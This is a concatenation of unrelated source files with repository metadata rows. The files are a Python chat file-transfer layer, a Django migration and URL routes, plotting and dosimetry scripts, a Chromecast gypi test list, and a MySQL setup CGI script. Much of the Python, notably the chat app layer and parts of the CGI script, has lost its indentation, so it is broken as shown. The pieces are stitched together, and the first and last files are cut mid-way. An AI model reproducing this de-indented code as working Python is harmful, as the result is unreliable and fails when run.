print("Error trying to read file before sending.\n_Particular error is {}".format(e.args))
raise self.FailedSend(e.args)
self._send_message(self.msg_types['FILE_END'], fname=self.short_fname(fname))
        return_str = '### File {} sent successfully ###'.format(self.short_fname(fname))
return bytes(return_str, 'utf-8')
def pause_receiving_file(self):
        '''
        Pause receiving the file.
        :return:
        '''
self.dl_layer.is_paused = True
def resume_receiving_file(self):
        '''
        Resume receiving the file.
        :return:
        '''
self.dl_layer.is_paused = False
self.dl_layer.send_rsm()
def receive_file(self, bytes_str):
"""
Получение файла из сети.
:param bytes_str: Строка из канального уровня.
:return: кортеж (отправитель "В", сообщение о получении файла)
"""
self.status = 'Receiving file'
        print('bytes before deforming:', bytes_str)
fname, data = [self._deform_message(bytes_str)[x] for x in ['fname', 'data']]
print('fname after deforming:', fname)
print('data after deforming:', data)
# print('data in receive_file:', data.decode('utf-8'))
if os.path.exists(os.path.join(self.save_dir_name, fname)):
with open(os.path.join(self.save_dir_name, fname), 'ab') as f:
f.write(data)
else:
with open(os.path.join(self.save_dir_name, fname), 'wb') as f:
f.write(data)
self.status = 'Free'
if self.dl_layer.is_paused:
self.text_buffer = data
return None
else:
if self.text_buffer != '':
data = self.text_buffer + data
self.text_buffer = ''
return data
else:
return data
def receive_file_completely(self, bytes_str):
        '''
        Handle the end-of-file message.
        :param bytes_str:
        :return:
        '''
self.status = 'Receiving file'
fname = self._deform_message(bytes_str)['fname']
self.status = 'Free'
        return_str = '\n### File {} fully received and saved ###\n'.format(fname)
return bytes(return_str, 'utf-8')
def set_connection(self, port_name):
"""
Установка соединения с заданным портом
:param port_name: имя порта для подключения
:return: результат подключения. None - если всё хорошо
"""
return self.dl_layer.set_connection(port_name)
@staticmethod
def short_fname(fname):
"""
Генерация "короткого" относительного пути файла
:param fname: абсолютный путь к файлу
:return: относительный путь к файлу
"""
return fname.split('/')[-1]
def _send_message(self, msg_type, fname=None, data=None):
"""
Общий алгоритм для отправки сообщения через сеть.
:param msg_type: тип сообщения
:param fname: абсолютный путь к файлу, если требуется
:param data: данные для передачи, если требуются
:return:
"""
self.status = 'Sending {}'.format(filter(lambda k: self.msg_types[k] == msg_type, self.msg_types))
if data:
print('data before forming:', data)
bytes_str = self._form_message(msg_type, fname=fname, data=data)
print('bytes after forming:', bytes_str)
# print('bytes after forming decoded:', bytes_str.decode('utf-8'))
try:
self.dl_layer.send_msg(bytes_str)
except ConnectionError as e:
self.status = 'Free'
raise self.FailedSend(e.args)
self.status = 'Free'
def _form_message(self, msg_type, data=None, fname=None):
"""
Обобщённое формирование сообщения на основе его типа и содержания
:param msg_type: тип сообщения
:param data: данные сообщения, если требуется
:param fname: абсолютное имя файла, если требуется
:return: сформированное сообщение для отправки через сеть
"""
def form(data, bytes_size_len, to_encode=True):
if data is None:
raise ValueError('No data passed to form function in form_message')
data_bytes = data.encode() if to_encode else data
if len(data_bytes) > 256**bytes_size_len:
raise OverflowError('Too large data to put its len into {} bytes'.format(bytes_size_len))
data_bytes_len = len(data_bytes)
return data_bytes_len.to_bytes(bytes_size_len, 'big') + data_bytes
if msg_type == self.msg_types['FILE']:
return msg_type + form(fname, self.FNAME_SIZE_LEN) + form(data, self.DATA_SIZE_LEN, to_encode=False)
elif msg_type in [self.msg_types[x] for x in ['FILE_PROPOSE', 'FILE_ACK', 'FILE_NAK', 'FILE_END']]:
return msg_type + form(fname, self.FNAME_SIZE_LEN)
elif msg_type == self.msg_types['MSG']:
return msg_type + form(data, self.MSG_SIZE_LEN)
else:
raise ValueError('Unknown message format. at app_layer.form_message')
def _deform_message(self, message):
"""
Извлечение полезной информации из сообщения
:param message: исходное сообщение, полученное процедурой _form_message
:return: словарь с полями: msg_type - тип сообщения
fname - название файла (опционально)
data - данные файла (опционально)
msg - содержимое сообщения из чата (опционально)
"""
msg_type = message[0:self.MSG_TYPE_LEN]
def parse(data, bytes_size_len, to_decode=True):
if not data:
raise ValueError("No data in parse function. Message is {}".format(message))
data_len = int.from_bytes(data[0:bytes_size_len], 'big')
parsed_data = data[bytes_size_len:data_len+bytes_size_len]
parsed_data = parsed_data.decode() if to_decode else parsed_data
return data_len+bytes_size_len, parsed_data
result = {'msg_type': msg_type}
if msg_type == self.msg_types['FILE']:
fname_size, fname = parse(message[self.MSG_TYPE_LEN:], self.FNAME_SIZE_LEN)
result['fname'] = fname
result['data'] = parse(message[self.MSG_TYPE_LEN+fname_size:], self.DATA_SIZE_LEN, to_decode=False)[1]
elif msg_type in [self.msg_types[x] for x in ['FILE_PROPOSE', 'FILE_ACK', 'FILE_NAK', 'FILE_END']]:
result['fname'] = parse(message[self.MSG_TYPE_LEN:], self.FNAME_SIZE_LEN)[1]
elif msg_type == self.msg_types['MSG']:
result['msg'] = parse(message[self.MSG_TYPE_LEN:], self.MSG_SIZE_LEN)[1]
else:
raise ValueError('Unknown message type at app_layer.deform_message - {}\n'
'message is {}'.format(msg_type, message))
return result
class FileNotAcknowledged(Exception):
"""
Особое исключение, если собеседник из чата отказывается принимать файл.
Используется для передачи этой информации в интерфейс программы.
"""
def __init__(self, message):
self.message = message
class FileProposal(Exception):
"""
Особое исключение, если собеседник из чата предлагает получить файл.
Используется для передачи этой информации в интерфейс программы.
"""
def __init__(self, message):
self.message = message
class FailedSend(Exception):
def __init__(self, message):
self.message = message
|
[
"svetlanazlobina97@gmail.com"
] |
svetlanazlobina97@gmail.com
|
f4a6c25493802d58f7b8566037d5f228f52ef6bb
|
546e6b1e2d0a3dd68f4bd3aaedde96e1ecbd94ad
|
/linkkısalt/linkler/migrations/0002_auto_20180316_1550.py
|
7d47d0c62f9310aedf1ce09bbc589be4f3919b9b
|
[] |
no_license
|
rifatalptekincetin/Django-Pyton
|
3d804fc72fc75ff163b9d8a26de16eae1a27e2f8
|
e3c640e7ae2141f7047fb2d2b78eaea11db332f1
|
refs/heads/master
| 2020-03-30T13:31:33.212545
| 2018-10-02T15:43:06
| 2018-10-02T15:43:06
| 151,275,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# Generated by Django 2.0.3 on 2018-03-16 12:50
from django.db import migrations, models
import linkler.models
class Migration(migrations.Migration):
dependencies = [
('linkler', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='link',
name='resim',
field=models.ImageField(blank=True, null=True, upload_to=linkler.models.link.save_path),
),
]
|
[
"34903387+rifatalptekincetin@users.noreply.github.com"
] |
34903387+rifatalptekincetin@users.noreply.github.com
|
9cdabaefe72d4543bfcca8e1713f3cb72e6a627c
|
6a7506417addcbba2c05bb979f79c5c7c495345c
|
/gbbo/plotter.py
|
a9cdaa2bab995bc3f187666f423e4a51c10c9ac3
|
[] |
no_license
|
charles-uno/charlesplotlib
|
0254a392afc45c9ea5b8b81e2afb479daecbf96f
|
f556191a70e795b2dcf266737be01a272e915730
|
refs/heads/master
| 2021-09-24T19:59:15.540743
| 2018-10-13T19:39:43
| 2018-10-13T19:39:43
| 56,997,117
| 0
| 1
| null | 2017-04-08T17:26:05
| 2016-04-24T22:21:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
#!/usr/bin/env python3
# ######################################################################
import matplotlib.pyplot as plt
# ######################################################################
def main():
data = load_season(3)
for name, scores in data.items():
print(name, '\t', scores)
for name, scores in data.items():
xvals = range(1, len(scores)+1)
plt.plot(xvals, scores, label=name)
plt.axis([0, 12, 0, 12])
plt.show()
return
# ######################################################################
def load_season(n):
scores = {}
for line in read('s' + str(n) + '.txt'):
# Skip spacer lines. We don't need to explicitly track episodes,
# since each baker appears exactly once in each.
if not line:
continue
name, score = line.split()
if name not in scores:
scores[name] = []
scores[name].append( int(score) )
return scores
# ----------------------------------------------------------------------
def read(filename):
with open(filename, 'r') as handle:
return [ x.rstrip() for x in handle ]
# ######################################################################
if __name__ == '__main__':
main()
|
[
"charles.a.mceachern@gmail.com"
] |
charles.a.mceachern@gmail.com
|
902c325a21f27a1be1fec85aa1dacea4b01bb3aa
|
010d64e4905a2dc16f7786b0c3ee6ae968b812b5
|
/experiment.py
|
1f44ea683d9d3e2691888879bb0569b9da37f216
|
[] |
no_license
|
jimmymenzies/aviation_dosimetry
|
af4e72bf2b5bd0447f02171c9a36f965f855b6a6
|
06ad06ecb6b800b9b976501d88b5273aa503cd63
|
refs/heads/master
| 2020-07-31T06:09:39.561259
| 2019-10-28T01:10:29
| 2019-10-28T01:10:29
| 210,511,214
| 0
| 1
| null | 2021-05-18T21:24:16
| 2019-09-24T04:23:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,970
|
py
|
import matplotlib.pyplot as plt
import pandas as pd
import requests
df = pd.read_csv("experiment.csv", skiprows=1, header=None)
df.columns = ["time", "dose", "altitude"]
latitude = -33.51 #(S) [-90, 90] degrees N is +ve
longitude = 147.24 #(E) [-180, 180] degrees E is +ve
year = '2015'
month = '7'
day = '19'
def get_api_data(particle, api):
url = "http://cosmicrays.amentum.space/" + api + "/ambient_dose"
values = []
for alt in df['altitude'] :
parameters = {
"altitude" : alt, #km
"latitude" : -33.51, #degrees (N)
"longitude" : 147.24, #degrees (E)
"year" : 2015,
"month" : 7,
"day" : 19,
"utc" : 10,
"particle" : particle
}
if particle == "gamma" and api == "cari7":
parameters["particle"] = "photon"
response = requests.get(url, params=parameters)
dose_rate = response.json()
dose_rate_val = dose_rate['dose rate']['value']
values.append(dose_rate_val)
return values
fig = plt.figure()
axes = fig.add_subplot(111)
axes.plot(
df['time'], df['dose'],
label="Experiment", linestyle="None", marker="x")
values = get_api_data("gamma", "parma")
axes.plot(
df['time'], values,
label="PARMA_g", linestyle="None", marker="x", color="red")
values = get_api_data("total", "parma")
axes.plot(
df['time'], values,
label="PARMA_t", linestyle="None", marker="+", color="red")
values = get_api_data("gamma", "cari7")
axes.plot(
df['time'], values,
label="CARI-7_g", linestyle="None", marker="x", color="blue")
values = get_api_data("total", "cari7")
axes.plot(
df['time'], values,
label="CARI-7_t", linestyle="None", marker="+", color="blue")
axes.set_xlim(left=0)
axes.set_ylim(bottom=0)
axes.set_xlabel("Time, s")
axes.set_ylabel("Doses, uSv")
plt.legend(loc="upper left")
#plt.show()
plt.savefig("lineplot.png")
|
[
"simmymenzies@gmail.com"
] |
simmymenzies@gmail.com
|
c46166ba76796d3e3bf7d72646fe57fbae97da09
|
496959e6ff3ab72875d70ceec9af1d15e9919020
|
/tests/test_scottbrian_secdata/__init__.py
|
1370a3d53341fd1193a01c538ed9cab096ceff1a
|
[
"MIT"
] |
permissive
|
ScottBrian/scottbrian_secdata
|
9990699181705c8612650697b9cf2d055df69723
|
ba1b4eead10d2f178a173f1ca9fdbb78ceb54c8d
|
refs/heads/master
| 2023-04-18T06:36:48.232821
| 2021-05-04T03:28:38
| 2021-05-04T03:28:38
| 364,025,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39
|
py
|
"""scottbrian_secdata test package."""
|
[
"12262512+ScottBrian@users.noreply.github.com"
] |
12262512+ScottBrian@users.noreply.github.com
|
089b43912c11374963f18cecdcb6edc51f2864c7
|
d5fab5f279eac9a0ee6d675c458d5dc6aad0adcf
|
/app/accounts/migrations/0008_auto_20190422_1933.py
|
ffd118a4f1441135d7215482fb3ef425dfc3209c
|
[] |
no_license
|
JeffMcCracken/new-music-app
|
66a9913a39f1ccf7b67475eff17fb82036733b98
|
3091b38b9cc511a652b45f02839adb558b46ffee
|
refs/heads/master
| 2020-04-24T23:29:39.867786
| 2019-04-22T20:21:57
| 2019-04-22T20:21:57
| 172,346,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# Generated by Django 2.2 on 2019-04-22 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0007_auto_20190422_1901'),
]
operations = [
migrations.RemoveField(
model_name='album',
name='album_art',
),
migrations.AddField(
model_name='album',
name='art_large',
field=models.CharField(default='asdfasdf', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='album',
name='art_medium',
field=models.CharField(default='asdfasdf', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='album',
name='art_small',
field=models.CharField(default='asdfasdf', max_length=255),
preserve_default=False,
),
]
|
[
"jeffmccracken12@gmail.com"
] |
jeffmccracken12@gmail.com
|
42b7e8840057bf9fac0befe7e09bf2123a0eaf04
|
154ad9b7b26b5c52536bbd83cdaf0a359e6125c3
|
/chromecast/chromecast_tests.gypi
|
cac841a18984ec9281897b8b31e6d17b330530c6
|
[
"BSD-3-Clause"
] |
permissive
|
bopopescu/jstrace
|
6cc239d57e3a954295b67fa6b8875aabeb64f3e2
|
2069a7b0a2e507a07cd9aacec4d9290a3178b815
|
refs/heads/master
| 2021-06-14T09:08:34.738245
| 2017-05-03T23:17:06
| 2017-05-03T23:17:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,722
|
gypi
|
# Copyright (c) 2014 Google Inc. All Rights Reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
'use_alsa%': 0,
},
'targets': [
{
'target_name': 'cast_base_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_base',
'cast_component',
'cast_crypto',
'../base/base.gyp:run_all_unittests',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
],
'sources': [
'base/bind_to_task_runner_unittest.cc',
'base/chromecast_switches_unittest.cc',
'base/component/component_unittest.cc',
'base/device_capabilities_impl_unittest.cc',
'base/error_codes_unittest.cc',
'base/path_utils_unittest.cc',
'base/process_utils_unittest.cc',
'base/serializers_unittest.cc',
'base/system_time_change_notifier_unittest.cc',
'crypto/signature_cache_unittest.cc',
],
'conditions': [
['OS == "android"', {
'dependencies': [
'<(DEPTH)/testing/android/native_test.gyp:native_test_native_code',
],
}],
],
}, # end of cast_base_unittests
{
'target_name': 'cast_crash_test_support',
'type': '<(component)',
'dependencies': [
'cast_base',
'cast_crash',
],
'sources': [
'crash/linux/crash_testing_utils.cc',
'crash/linux/crash_testing_utils.h',
],
}, # end of target 'cast_crash_test_support'
{
'target_name': 'cast_crash_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_crash',
'cast_crash_test_support',
'../base/base.gyp:run_all_unittests',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
],
'include_dirs': [
'../breakpad/src',
],
'sources': [
'crash/cast_crashdump_uploader_unittest.cc',
'crash/linux/dummy_minidump_generator_unittest.cc',
'crash/linux/dump_info_unittest.cc',
'crash/linux/synchronized_minidump_manager_unittest.cc',
'crash/linux/minidump_writer_unittest.cc',
],
'conditions': [
['OS == "android"', {
'dependencies': [
'<(DEPTH)/testing/android/native_test.gyp:native_test_native_code',
],
}],
],
}, # end of cast_crash_unittests
{
'target_name': 'cast_tests',
'type': 'none',
'dependencies': [
'cast_test_generator',
],
'conditions': [
['chromecast_branding!="public"', {
'dependencies': [
'internal/chromecast_internal.gyp:cast_tests_internal',
],
}],
],
},
# This target only depends on targets that generate test binaries.
{
'target_name': 'cast_test_generator',
'type': 'none',
'dependencies': [
'cast_base_unittests',
'../base/base.gyp:base_unittests',
'../content/content_shell_and_tests.gyp:content_unittests',
'../crypto/crypto.gyp:crypto_unittests',
'../ipc/ipc.gyp:ipc_tests',
'../jingle/jingle.gyp:jingle_unittests',
'../media/media.gyp:media_unittests',
'../media/midi/midi.gyp:midi_unittests',
'../net/net.gyp:net_unittests',
'../ppapi/ppapi_internal.gyp:ppapi_unittests',
'../sandbox/sandbox.gyp:sandbox_linux_unittests',
'../sql/sql.gyp:sql_unittests',
'../third_party/cacheinvalidation/cacheinvalidation.gyp:cacheinvalidation_unittests',
'../ui/base/ui_base_tests.gyp:ui_base_unittests',
'../url/url.gyp:url_unittests',
],
'conditions': [
['OS=="linux" and is_cast_desktop_build==0', {
'variables': {
'filters': [
# Run net_unittests first to avoid random failures due to slow python startup
# KeygenHandlerTest.SmokeTest and KeygenHandlerTest.ConcurrencyTest fail due to
# readonly certdb (b/8153161)
# URLRequestTestHTTP.GetTest_ManyCookies takes roughly 55s to run. Increase
# timeout to 90s from 45s to allow it to pass (b/19821476)
# ProxyScriptFetcherImplTest.HttpMimeType is flaking (b/19848784)
# Running a batch of net_unittests has high overhead. Run tests in batches of 25 to reduce number of batches (b/23156294).
'net_unittests --gtest_filter=-KeygenHandlerTest.SmokeTest:KeygenHandlerTest.ConcurrencyTest:ProxyScriptFetcherImplTest.HttpMimeType --test-launcher-timeout=90000 --test-launcher-batch-limit=25',
# Disable ProcessMetricsTest.GetNumberOfThreads (b/15610509)
# Disable ProcessUtilTest.* (need to define OS_ANDROID)
# Disable StackContainer.BufferAlignment (don't support 16-byte alignment)
# Disable SystemMetrics2Test.GetSystemMemoryInfo (buffers>0 can't be guaranteed)
'base_unittests --gtest_filter=-ProcessMetricsTest.GetNumberOfThreads:ProcessUtilTest.*:StackContainer.BufferAlignment:SystemMetrics2Test.GetSystemMemoryInfo',
# DesktopCaptureDeviceTest.*: No capture device on Eureka
# Disable PepperGamepadHostTest.WaitForReply (pepper not supported on Eureka)
# Disable GpuDataManagerImplPrivateTest.SetGLStrings and
# RenderWidgetHostTest.Background because we disable the blacklist to enable WebGL (b/16142554)
'content_unittests --gtest_filter=-DOMStorageDatabaseTest.TestCanOpenAndReadWebCoreDatabase:DesktopCaptureDeviceTest.Capture:GamepadProviderTest.PollingAccess:GpuDataManagerImplPrivateTest.SetGLStrings:PepperGamepadHostTest.WaitForReply:RenderWidgetHostTest.Background',
# Disable VP9 related tests (b/18593324)
# PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM
# PipelineIntegrationTest.BasicPlayback_VideoOnly_VP9_WebM
# PipelineIntegrationTest.BasicPlayback_VP9*
# PipelineIntegrationTest.P444_VP9_WebM
# Disable VP8A tests (b/18593324)
# PipelineIntegrationTest.BasicPlayback_VP8A*
# Disable OpusAudioDecoderTest/AudioDecoderTest.ProduceAudioSamples/0 (unit
# test fails when Opus decoder uses fixed-point)
# Due to b/16456550, disable the following four test cases:
# AudioOutputControllerTest.PlayDivertSwitchDeviceRevertClose
# AudioOutputControllerTest.PlaySwitchDeviceClose
# AudioStreamHandlerTest.Play
# SoundsManagerTest.Play
# Disable AudioStreamHandlerTest.ConsecutivePlayRequests (b/16539293)
'media_unittests --gtest_filter=-AudioOutputControllerTest.PlayDivertSwitchDeviceRevertClose:AudioOutputControllerTest.PlaySwitchDeviceClose:AudioStreamHandlerTest.Play:AudioStreamHandlerTest.ConsecutivePlayRequests:PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM:PipelineIntegrationTest.BasicPlayback_VideoOnly_VP9_WebM:PipelineIntegrationTest.BasicPlayback_VP9*:PipelineIntegrationTest.P444_VP9_WebM:PipelineIntegrationTest.BasicPlayback_VP8A*:OpusAudioDecoderTest/AudioDecoderTest.ProduceAudioSamples/0:SoundsManagerTest.Play',
# DoAppendUTF8Invalid fails because of dcheck_always_on flag in Eng builds
'url_unittests --gtest_filter=-URLCanonTest.DoAppendUTF8Invalid',
],
},
}, { # else desktop or android
'variables': {
'filters': [
# Disable PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM (not supported)
'media_unittests --gtest_filter=-PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM',
],
}
}],
['OS=="linux"', {
'dependencies': [
'cast_crash_unittests',
],
}],
['disable_display==0', {
'dependencies': [
'../gpu/gpu.gyp:gpu_unittests',
],
}],
['OS!="android"', {
'dependencies': [
'cast_shell_unittests',
'cast_shell_browser_test',
'media/media.gyp:cast_media_unittests',
],
'variables': {
'filters': [
# --enable-local-file-accesses => to load sample media files
# --test-launcher-jobs=1 => so internal code can bind to port
'cast_shell_browser_test --no-sandbox --enable-local-file-accesses --enable-cma-media-pipeline --ozone-platform=cast --test-launcher-jobs=1',
'cast_media_unittests --test-launcher-jobs=1',
],
},
'conditions': [
['use_alsa==1', {
'dependencies': [
'media/media.gyp:cast_alsa_cma_backend_unittests',
],
}],
],
}],
],
'includes': ['build/tests/test_list.gypi'],
},
{
'target_name': 'cast_metrics_test_support',
'type': '<(component)',
'dependencies': [
'cast_base',
],
'sources': [
'base/metrics/cast_metrics_test_helper.cc',
'base/metrics/cast_metrics_test_helper.h',
],
}, # end of target 'cast_metrics_test_support'
], # end of targets
'conditions': [
['OS=="android"', {
'targets': [
{
'target_name': 'cast_base_unittests_apk',
'type': 'none',
'dependencies': [
'cast_base_unittests',
],
'variables': {
'test_suite_name': 'cast_base_unittests',
},
'includes': ['../build/apk_test.gypi'],
}, # end of target 'cast_base_unittests_apk'
{
'target_name': 'cast_android_tests',
'type': 'none',
'dependencies': ['cast_android_tests_generator'],
'conditions': [
['chromecast_branding!="public"', {
'dependencies': [
'internal/chromecast_internal.gyp:cast_android_tests_internal',
],
}],
],
}, # end of target 'cast_android_tests',
{
'target_name': 'cast_android_tests_generator',
'type': 'none',
'variables': {
'filters': [
# ComponentDeathTest is unable to fork processes on Android
'cast_base_unittests_apk --gtest_filter=*:-ComponentDeathTest.*',
# LayerTreeHost has dozens of separate crashing test cases on Fugu. (b/22512618)
'cc_unittests_apk --gtest_filter=*:-LayerTreeHost*',
# The following tests all crash on fugu.
'gfx_unittests_apk --gtest_filter=*:-FontListTest.Fonts_DeriveWithHeightUpperBound',
'media_unittests_apk --gtest_filter=*-AudioInputTest.*:AudioAndroidInputTest*',
],
},
'dependencies': [
'cast_base_unittests_apk',
'../base/base.gyp:base_unittests_apk',
'../cc/cc_tests.gyp:cc_unittests_apk',
'../ipc/ipc.gyp:ipc_tests_apk',
'../media/media.gyp:media_unittests_apk',
'../media/midi/midi.gyp:midi_unittests_apk',
'../net/net.gyp:net_unittests_apk',
'../sql/sql.gyp:sql_unittests_apk',
'../ui/events/events_unittests.gyp:events_unittests_apk',
'../ui/gfx/gfx_tests.gyp:gfx_unittests_apk',
],
'includes': ['build/tests/test_list.gypi'],
}, # end of target 'cast_android_tests_generator'
{
'target_name': 'cast_android_test_lists',
'type': 'none',
'dependencies': [
'cast_android_tests',
],
'variables': {
'test_generator_py': '<(DEPTH)/chromecast/tools/build/generate_test_lists.py',
'test_inputs_dir': '<(SHARED_INTERMEDIATE_DIR)/chromecast/tests',
},
'actions': [
{
'action_name': 'generate_combined_test_build_list',
'message': 'Generating combined test build list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/build_test_list_android.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'pack_build',
],
},
{
'action_name': 'generate_combined_test_run_list',
'message': 'Generating combined test run list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/run_test_list.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'pack_run',
],
}
],
},
], # end of targets
}, { # OS!="android"
'targets': [
# GN target: //chromecast/browser:test_support
{
'target_name': 'cast_shell_test_support',
'type': '<(component)',
'defines': [
'HAS_OUT_OF_PROC_TEST_RUNNER',
],
'dependencies': [
'cast_shell_core',
'../content/content_shell_and_tests.gyp:content_browser_test_base',
'../content/content_shell_and_tests.gyp:content_browser_test_support',
'../mojo/mojo_public.gyp:mojo_cpp_bindings',
'../testing/gtest.gyp:gtest',
],
'export_dependent_settings': [
'../content/content_shell_and_tests.gyp:content_browser_test_base',
],
'sources': [
'browser/test/chromecast_browser_test.cc',
'browser/test/chromecast_browser_test.h',
'browser/test/chromecast_browser_test_helper.h',
'browser/test/chromecast_browser_test_runner.cc',
],
}, # end of target 'cast_shell_test_support'
{
'target_name': 'cast_shell_browser_test',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_shell_test_support',
'../content/content_shell_and_tests.gyp:test_support_content',
'../media/media.gyp:media_test_support',
'../testing/gtest.gyp:gtest',
],
'defines': [
'HAS_OUT_OF_PROC_TEST_RUNNER',
],
'sources': [
'browser/test/chromecast_shell_browser_test.cc',
],
'conditions': [
['chromecast_branding=="public"', {
'dependencies': [
# Link default libcast_media_1.0 statically to prevent
# linking dynamically against dummy implementation.
'media/media.gyp:libcast_media_1.0_default_core',
],
'sources': [
'browser/test/chromecast_browser_test_helper_default.cc',
],
},{
'dependencies': [
'internal/chromecast_internal.gyp:cast_shell_browser_test_helper_internal',
],
}],
],
},
# GN target: //chromecast/app:cast_shell_unittests
{
'target_name': 'cast_shell_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_crash_client',
'cast_crash_test_support',
'../base/base.gyp:run_all_unittests',
'../testing/gtest.gyp:gtest',
],
'sources': [
'app/linux/cast_crash_reporter_client_unittest.cc',
],
}, # end of cast_shell_unittests
# Builds all tests and the output lists of build/run targets for those tests.
# Note: producing a predetermined list of dependent inputs on which to
# regenerate this output is difficult with GYP. This file is not
# guaranteed to be regenerated outside of a clean build.
# GN target: //chromecast:cast_test_lists
{
'target_name': 'cast_test_lists',
'type': 'none',
'dependencies': [
'cast_tests',
],
'variables': {
'test_generator_py': '<(DEPTH)/chromecast/tools/build/generate_test_lists.py',
'test_inputs_dir': '<(SHARED_INTERMEDIATE_DIR)/chromecast/tests',
'test_additional_options': '--ozone-platform=headless'
},
'actions': [
{
'action_name': 'generate_combined_test_build_list',
'message': 'Generating combined test build list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/build_test_list.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'pack_build',
],
},
{
'action_name': 'generate_combined_test_run_list',
'message': 'Generating combined test run list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/run_test_list.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'-a', '<(test_additional_options)',
'pack_run',
],
}
],
},
], # end of targets
}],
], # end of conditions
}
|
[
"zzbthechaos@gmail.com"
] |
zzbthechaos@gmail.com
|
9a920a85204bde626db21838a35d3fc165f43fd6
|
bccb2cb00fecc24031e727a0ecbc246338d488eb
|
/softdesk/projects/urls.py
|
d626d5a3fe957659b1da54abdb0ca14ff8bde741
|
[] |
no_license
|
Arnaud290/OC_P10
|
03c8e85e8f89d7a32afea086b56adea34047ab53
|
fb22c9e8906d2b61e6fa575ea2e271933e19b2ca
|
refs/heads/master
| 2023-04-27T04:59:40.320393
| 2021-05-19T11:45:59
| 2021-05-19T11:45:59
| 361,775,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,032
|
py
|
"""Projects application url management module"""
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from projects import views
urlpatterns = [
path(
'',
views.ProjectList.as_view()
),
path(
'<int:pk>',
views.ProjectDetail.as_view()
),
path(
'<int:project_id>/users/',
views.ContributorList.as_view()
),
path(
'<int:project_id>/users/<int:pk>',
views.ContributorDelete.as_view()
),
path(
'<int:project_id>/issues/',
views.IssueList.as_view()
),
path(
'<int:project_id>/issues/<int:pk>',
views.IssueDetail.as_view()
),
path(
'<int:project_id>/issues/<int:issue_id>/comments/',
views.CommentList.as_view()
),
path(
'<int:project_id>/issues/<int:issue_id>/comments/<int:pk>',
views.CommentDetail.as_view()
),
]
urlpatterns = format_suffix_patterns(urlpatterns)
|
[
"arnaud.manach@gmail.com"
] |
arnaud.manach@gmail.com
|
531448f265fec95557c5fe380804ddd49560f57a
|
07add4cdb85d5bdbf5c5c3e716e0b1d4ceb3f152
|
/se-annotate/create_and_fill_databases.cgi
|
069b4cb76163c630c027d85c4d7668ad0e026f14
|
[] |
no_license
|
D1Doris/AnnotateCQADupStack
|
8c85db304930adbd5447303bde4a46eb3508732b
|
31323a45122f048377c72383bfe3a5125f76c365
|
refs/heads/master
| 2021-01-18T23:22:39.040909
| 2016-06-04T04:41:00
| 2016-06-04T04:41:00
| 55,202,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,768
|
cgi
|
#!/usr/bin/env python
import cgi
import os, glob, re, sys
import mysql.connector as conn
import query_cqadupstack_barebones as qse
def connectDB():
db = conn.connect(host="localhost", user="someuser", passwd="somepassword", port=3306)
cursor = db.cursor()
return db,cursor
def createDB(db, cursor, subforum):
sql = "create database " + subforum
cursor.execute(sql)
db.commit()
def createTables(db, cursor, subforum):
# Create one table for the posts
sql = "use " + subforum
cursor.execute(sql)
sql = '''create table posts
(postid int not null,
title varchar(150) not null,
body varchar(30000) not null,
primary key(postid))'''
cursor.execute(sql)
db.commit()
# Create one table for the demo user
sql = "use " + subforum
cursor.execute(sql)
sql = '''CREATE TABLE table_demo
(pairid INT NOT NULL AUTO_INCREMENT,
pair VARCHAR(15) NOT NULL,
pairtype VARCHAR(20) NOT NULL,
verdict VARCHAR(20),
primary key(pairid)
)'''
cursor.execute(sql)
db.commit()
# types should be one of 'transitive', 'fn' or 'transitive and fn'. At least at this stage.
def populateDB(db, cursor, subforum, zipdir, csvdir):
# First populate the posts table
forumfile = zipdir + '/' + subforum + '.zip'
o = qse.load_subforum(forumfile)
postids = o.get_all_postids()
totids = len(postids)
count = 1
for postid in postids:
if count % 10000 == 0:
print 'Added ' + str(count) + ' out of ' + str(totids) + ' posts to ' + subforum + ' database.'
title = o.url_cleaning(o.get_posttitle(postid))
body = o.url_cleaning(o.get_postbody(postid))
if not re.search('[A-Za-z0-9]', title) and not re.search('[A-Za-z0-9]', body):
print "WARNING: Empty title and body for post", postid
elif not re.search('[A-Za-z0-9]', title):
print "WARNING: Empty title for post", postid
elif not re.search('[A-Za-z0-9]', body):
print "WARNING: Empty body for post", postid
count += 1
